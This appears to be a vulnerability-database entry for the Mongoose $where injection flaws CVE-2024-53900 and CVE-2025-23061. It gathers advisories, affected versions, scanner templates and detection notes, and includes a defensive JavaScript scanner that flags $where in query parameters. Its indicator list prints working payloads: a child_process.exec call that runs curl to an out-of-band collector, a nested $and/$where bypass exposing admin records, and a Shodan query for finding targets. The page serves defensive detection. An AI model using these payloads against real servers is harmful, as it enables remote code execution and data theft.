CVE-2024-53900
Published 2024-12-02
CVE-2024-53900: Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.
Priority: P180 · critical · 9.1 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Flags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 3.99% (89.2th percentile)
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cesanta | mongoose | >= 0 < 6.13.6 | 6.13.6 |
| cesanta | mongoose | >= 3.6.0-rc0 < 5.13.23 | 5.13.23 |
| cesanta | mongoose | >= 6.0.0-rc0 < 6.13.5 | 6.13.5 |
| cesanta | mongoose | >= 7.0.0-rc0 < 7.8.3 | 7.8.3 |
| cesanta | mongoose | >= 7.0.0-rc0 < 7.8.4 | 7.8.4 |
| cesanta | mongoose | >= 8.0.0-rc0 < 8.8.3 | 8.8.3 |
| cesanta | mongoose | >= 8.0.0-rc0 < 8.9.5 | 8.9.5 |
| mongoosejs | mongoose | < 6.13.6 | 6.13.6 |
| mongoosejs | mongoose | < 6.13.5 | 6.13.5 |
| mongoosejs | mongoose | >= 6.0.0 < 6.13.6 | 6.13.6 |
| mongoosejs | mongoose | >= 7.0.0 < 7.8.4 | 7.8.4 |
| mongoosejs | mongoose | >= 7.0.1 < 7.8.3 | 7.8.3 |
| mongoosejs | mongoose | >= 8.0.0 < 8.9.5 | 8.9.5 |
| mongoosejs | mongoose | >= 8.0.1 < 8.8.3 | 8.8.3 |
Detection & IOCs (extracted from sources)
- url: {{BaseURL}}?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('curl {{interactsh-url}}')
- command: global.process.mainModule.constructor._load('child_process').exec('curl {{interactsh-url}}')
- url: {{BaseURL}}/posts?authorMatch={"$and":[{"$where":"this.isAdmin"}]}
- other: view[match][$where]=
- other: {"$and":[{"$where":"this.isAdmin"}]}
- Detect CVE-2024-53900 exploitation by monitoring HTTP GET requests containing '$where' within the 'match' query parameter, specifically the pattern 'view[match][$where]=' in request URLs targeting Mongoose-backed Node.js applications.
- Detect the CVE-2025-23061 bypass (incomplete fix for CVE-2024-53900) by monitoring for nested $where operators inside logical operators such as $and in query parameters, e.g. '$and':[{'$where':...}] in HTTP requests to populate()-backed endpoints.
- Response-based detection: a successful exploit of the nested $where bypass returns a JSON body containing '"isAdmin":true' alongside '"title":' and '"username":' fields with HTTP 200 and Content-Type application/json.
- Out-of-band detection: monitor for outbound curl HTTP callbacks to an interactsh/OAST collector originating from the MongoDB/Node.js server process, triggered by the injected child_process.exec payload.
- Use Shodan query 'Server: Mongoose' or title:"Mongoose" to identify potentially exposed Mongoose-backed services for proactive scanning.
- CVE-2024-53900 affects Mongoose versions before 8.8.3; the incomplete fix was bypassed in CVE-2025-23061, which requires Mongoose < 8.9.5. Detection rules should account for both version ranges.
- The CVE-2025-23061 bypass works specifically because the patched code blocks direct top-level $where but does not recurse into nested logical operators ($and, $or, etc.); detection logic must inspect nested query structures, not just top-level keys.
- The exploit path targets the populate() function's 'match' option; detection should be scoped to endpoints that accept user-controlled match/filter parameters passed to Mongoose populate(), not all MongoDB query endpoints.
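The recursive inspection the notes above call for, as an added example that is not code from this page or from the Mongoose project: it walks a parsed match/filter object for `$where` at any depth (including operands of `$and`/`$or`/`$nor`), and runs that check over request URLs in both the bracket-style and JSON-valued parameter forms listed above. The sample request lines are constructed; the `inspectUrl` and `findWhere` names are this example's own.

```javascript
// Added example (not code from the page or the Mongoose project): a defender-side
// scan for `$where` anywhere in a query object. Nested operands of $and/$or/$nor
// are walked too, which is the form that bypassed the first fix.

// Return the paths at which a `$where` key appears inside `value`.
function findWhere(value, path = '$') {
  const hits = [];
  if (Array.isArray(value)) {
    value.forEach((item, i) => hits.push(...findWhere(item, `${path}[${i}]`)));
  } else if (value !== null && typeof value === 'object') {
    for (const [key, child] of Object.entries(value)) {
      const childPath = `${path}.${key}`;
      if (key === '$where') hits.push(childPath);
      hits.push(...findWhere(child, childPath)); // keep descending: $where may sit deeper
    }
  }
  return hits;
}

// Inspect one request URL (path + query). Flags bracket-style parameter names such
// as `view[match][$where]` and any JSON-valued parameter that contains `$where`.
function inspectUrl(rawUrl) {
  // The base is only needed so relative request paths from logs can be parsed.
  const url = new URL(rawUrl, 'http://placeholder.invalid');
  const findings = [];
  for (const [name, rawValue] of url.searchParams) {
    if (/\[\$where\]/.test(name)) findings.push({ param: name, path: 'bracket-key' });
    if (rawValue.trimStart().startsWith('{')) {
      try {
        for (const p of findWhere(JSON.parse(rawValue))) findings.push({ param: name, path: p });
      } catch (_) { /* not JSON: nothing to walk */ }
    }
  }
  return findings;
}

// Constructed sample request lines modelled on the two URL patterns on the page.
const SAMPLE_REQUESTS = [
  '/posts?authorMatch={"author":"alice"}',                    // benign filter
  '/?view[path]=author&view[match][$where]=this.isAdmin',     // direct $where (CVE-2024-53900 pattern)
  '/posts?authorMatch={"$and":[{"$where":"this.isAdmin"}]}',  // nested bypass (CVE-2025-23061 pattern)
];

for (const req of SAMPLE_REQUESTS) {
  const hits = inspectUrl(req);
  console.log(hits.length ? 'ALERT' : 'ok   ', req, JSON.stringify(hits));
}
```

The same `findWhere` walk can be applied server-side to a user-supplied `match` object before it reaches `populate()`, rejecting the request when it returns any path.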
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.1 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N |
| ghsa | | 9.1 | CRITICAL | |
| osv | | 9.1 | CRITICAL | |
| vulncheck | | 9.1 | CRITICAL | |
GHSA
CVE-2025-23061 [CRITICAL] CWE-94 Mongoose search injection vulnerability
ghsa · 2025-01-15 · CVSS 9.1
Mongoose versions prior to 8.9.5, 7.8.4, and 6.13.6 are vulnerable to improper use of the `$where` operator. This vulnerability arises from the ability of the `$where` clause to execute arbitrary JavaScript code in MongoDB queries, potentially leading to code injection attacks and unauthorized access or manipulation of database data.
NOTE: this issue exists because of an incomplete fix for CVE-2024-53900.
OSV
CVE-2025-23061 [CRITICAL] Mongoose search injection vulnerability
osv · 2025-01-15 · CVSS 9.1
Mongoose versions prior to 8.9.5, 7.8.4, and 6.13.6 are vulnerable to improper use of the `$where` operator. This vulnerability arises from the ability of the `$where` clause to execute arbitrary JavaScript code in MongoDB queries, potentially leading to code injection attacks and unauthorized access or manipulation of database data.
NOTE: this issue exists because of an incomplete fix for CVE-2024-53900.
OSV
CVE-2024-53900 [HIGH] Mongoose search injection vulnerability
osv · 2024-12-02
Mongoose versions prior to 8.8.3, 7.8.3, 6.13.5, and 5.13.23 are vulnerable to improper use of the $where operator. This vulnerability arises from the ability of the $where clause to execute arbitrary JavaScript code in MongoDB queries, potentially leading to code injection attacks and unauthorized access or manipulation of database data.
GHSA
CVE-2024-53900 [HIGH] CWE-89 Mongoose search injection vulnerability
ghsa · 2024-12-02
Mongoose versions prior to 8.8.3, 7.8.3, 6.13.5, and 5.13.23 are vulnerable to improper use of the $where operator. This vulnerability arises from the ability of the $where clause to execute arbitrary JavaScript code in MongoDB queries, potentially leading to code injection attacks and unauthorized access or manipulation of database data.
VulnCheck
CVE-2024-53900 [CRITICAL] mongoosejs mongoose Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck · 2024 · CVSS 9.1
Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.
Affected: mongoosejs mongoose
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2024-53900
Exploit PoC: https://vulncheck.com/xdb/e7514d843948
No detection rules found.
Nuclei
CVE-2025-23061 [CRITICAL] Mongoose - NoSQL Injection
nuclei · CVSS 9.1
NoSQL injection vulnerability in Mongoose < 8.9.5 affecting the populate() function's match option. This vulnerability exists due to an incomplete fix for CVE-2024-53900. While direct $where injection is blocked, attackers can bypass this protection by nesting $where operators within logical operators like $and, allowing execution of arbitrary JavaScript code on MongoDB server, bypassing authentication, and accessing sensitive administrative data.
Template (truncated as indexed):
```yaml
id: CVE-2025-23061
info:
  name: Mongoose - NoSQL Injection
  author: NamhyunKo
  severity: critical
  description: |
    NoSQL injection vulnerability in Mongoose < 8.9.5 affecting the populate() function's match option. This vulnerability exists due to an incomplete fix for CVE-2024-53900. While direct $where inject
```
Nuclei
CVE-2024-53900 [CRITICAL] Mongoose < 8.8.3 - Remote Code Execution
nuclei · CVSS 9.1
Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.
Template (truncated as indexed):
```yaml
id: CVE-2024-53900
info:
  name: Mongoose < 8.8.3 - Remote Code Execution
  author: h4mg
  severity: critical
  description: |
    Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.
  impact: |
    Unauthenticated attackers can execute arbitrary code by exploiting NoSQL injection in the $where clause, allowing remote code execution via crafted query parameters.
  remediation: |
    Update Mongoose to version 8.8.3 or later to address the NoSQL injection vulnerability.
  reference:
    - https://github.com/Automattic/mongoose/commit/c9e86bff7eef477da75a29af62a06d41a835a156
    - https://github.com/advisories/GHSA-m7xq-9374-9rvx
    - https://www.youtube
```
No writeups or analysis indexed.
References:
- https://github.com/Automattic/mongoose/blob/master/CHANGELOG.md
- https://github.com/Automattic/mongoose/commit/c9e86bff7eef477da75a29af62a06d41a835a156
- https://github.com/Automattic/mongoose/releases
- https://github.com/advisories/GHSA-m7xq-9374-9rvx
- https://www.npmjs.com/package/mongoose?activeTab=versions